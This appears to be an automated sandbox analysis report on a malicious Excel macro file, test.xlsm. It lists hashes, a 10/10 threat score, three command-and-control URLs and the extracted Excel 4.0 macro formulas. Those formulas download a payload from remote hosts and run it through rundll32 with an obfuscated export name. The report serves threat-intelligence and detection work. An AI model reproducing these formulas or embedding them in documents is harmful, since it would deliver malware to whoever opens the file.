Overview

overview

10

Static

static

10

test.xlsm

windows7-x64

10

test.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    test.xlsm

  • Size

    83KB

  • MD5

    8fbf9860fb4875112772af77f004da67

  • SHA1

    fd4b875e7c386e3321a623a3bf8e2d0c13d79d8a

  • SHA256

    66676f6cb631e7ff6a516495a780afcf23189458176b5ec68addb9f1395289e6

  • SHA512

    f7a5dfc21723b55440b8f4f310e954bb6d4088314838cb75e5f9c54dbb10d7f5f251aeb742717cde1d12ad922b9e9bb37e7145145e05bc53f1ef5c8c20e1c4f2

  • SSDEEP

    1536:Xycd7LWsqxG/+CbEcWeu3XDXeoiHwt/uE1d7mT6SrPag3HtQVASgVU:ii32G/+CbE9H78wt2E1d7e6STa6Sx

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://zml.laneso.com/packet/AlvJ8OdtSYEeeCQP/

http://ostadsarma.com/wp-admin/JNgASjNC/

http://govtjobresultbd.xyz/sjjz/UIUhOHsLqjOy9/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://zml.laneso.com/packet/AlvJ8OdtSYEeeCQP/","..\erum.ocx",0,0) =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ostadsarma.com/wp-admin/JNgASjNC/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://govtjobresultbd.xyz/sjjz/UIUhOHsLqjOy9/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • test.xlsm
    .xlsm office2007